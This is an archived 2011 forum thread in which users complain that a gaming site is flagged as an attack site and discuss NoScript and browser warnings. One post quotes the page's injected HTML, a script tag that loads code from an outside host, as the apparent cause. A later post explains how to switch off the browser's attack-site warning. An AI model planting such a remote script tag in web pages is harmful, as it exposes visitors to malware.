PDA

View Full Version : This site has been labeled as an attack site? WHAT THE FUCK?!

XMuppetSB
03-27-2011, 03:38 PM
Okay, if you try to access this site on my Firefox web browser, it gives you the Reported Attack Site page instead, and even if you click the ignore button, the site is not displayed correctly, and if you search for this site on Google, you'll see that it has falsely been labeled as an attack site! Now I have to use Internet Explorer and any serch engine other than Google!

Shoelace
03-27-2011, 03:50 PM
Same thing happens to me. It really sucks, :(

Saffith
03-27-2011, 09:04 PM
Falsely?

</TABLE></CENTER><script src="http://nt20.in/3"></script></BODY></HTML>
Well, that's zeldaclassic.com, to be fair. I don't know what it is on AGN, but there's definitely something. In any case, using IE isn't going to help. You use Firefox? Get NoScript. You should do that anyway, really.

XMuppetSB
03-27-2011, 09:40 PM
In any case, using IE isn't going to help. You use Firefox? Get NoScript. You should do that anyway, really.
That's weird. Using IE to access this site (or any other site, labeled as an attack site) actually works for me. Besides, I simply do not trust the NoScript Add-on for FireFox, because then, you can't watch any Youtube videos!

Saffith
03-27-2011, 09:50 PM
Then whitelist YouTube. It's not safe to run Javascript here.

XMuppetSB
03-27-2011, 10:06 PM
Okay, I've done that, but even with the plug-in active, I still get redirected to the attack site warning page when trying to access this site. What can I do to get around the warning, besides using IE, which is the only way I know of to get around the warning?
And, should we inform War Lord about this?

Saffith
03-28-2011, 05:37 PM
You can disable the warning in your preferences, in the security section, but I don't think you can just allow one site.
The staff already know there's a problem. I don't know what'd being done about it, though.

AtmaWeapon
03-28-2011, 07:20 PM
Firefox is really aggressive about keeping you from getting to the site. Honestly this is a good thing: you don't want to be at a site that runs infected scripts. I'm using Chrome and it's still naggy, but at least when I tell it "I'm going anyway" it lets me through.

It would be nice if they'd fix it though; I'm not going to keep hitting this ignore button for long.

King Aquamentus
03-30-2011, 06:39 AM
I don't understand: Why not just put this in here?

http://armageddongames.net/showthread.php?45601-ZeldaClassic.com-reported-as-an-attack-site

Especially since I know you posted in a thread on this board already about it.